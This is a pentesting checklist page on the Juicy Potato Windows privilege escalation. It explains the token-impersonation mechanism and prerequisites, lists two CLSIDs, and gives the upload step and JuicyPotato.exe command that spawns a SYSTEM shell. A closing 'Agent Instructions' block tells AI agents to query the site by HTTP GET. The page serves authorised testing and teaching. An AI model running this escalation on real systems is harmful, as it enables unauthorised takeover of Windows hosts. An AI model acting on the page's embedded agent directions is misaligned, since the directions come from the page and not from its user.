# Juicy Potato

### Overview

**Juicy Potato** is a **Windows local privilege escalation (LPE)** technique that abuses **token impersonation privileges** to escalate from a **low-privileged service account** to **NT AUTHORITY\SYSTEM**.

It is an evolution of **Rotten Potato** and relies on abusing:

* **DCOM activation**
* **NTLM authentication**
* **SeImpersonatePrivilege**

### Why this Works

Windows allows a process with **SeImpersonatePrivilege** to impersonate another user’s access token if that user authenticates to it.

Juicy Potato:

1. Starts a **fake COM server**
2. Triggers a **SYSTEM DCOM service** to authenticate to it
3. Captures the **SYSTEM access token**
4. Impersonates the token
5. Executes attacker-controlled code as SYSTEM

### Prerequisites

1. Local Code Execution
2. Token Impersonation Privilege
3. Machine is < `Windows 10 1809` < `Windows Server 2019`&#x20;
4. DCOM Enabled

### Steps

1. Check Token Privileges
2. Upload Juicy Potato:

   ```bash
   copy JuicyPotato.exe C:\Temp\
   ```
3. Select a CLSID. Juicy Potato requires a **vulnerable CLSID**. Common CLSIDs:&#x20;

   ```
   {E60687F7-01A1-40AA-86AC-DB1CBF673334}
   {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
   ```
4. Execute Exploit:

   ```bash
   # -l → listening port
   # -p → payload
   # -t * → try both impersonation methods
   # -c → CLSID
   JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
   ```

### References

1. <https://github.com/ohpe/juicy-potato>
2. <https://jlajara.gitlab.io/Potatoes_Windows_Privesc#juicyPotato>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/potato-attacks/juicy-potato.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.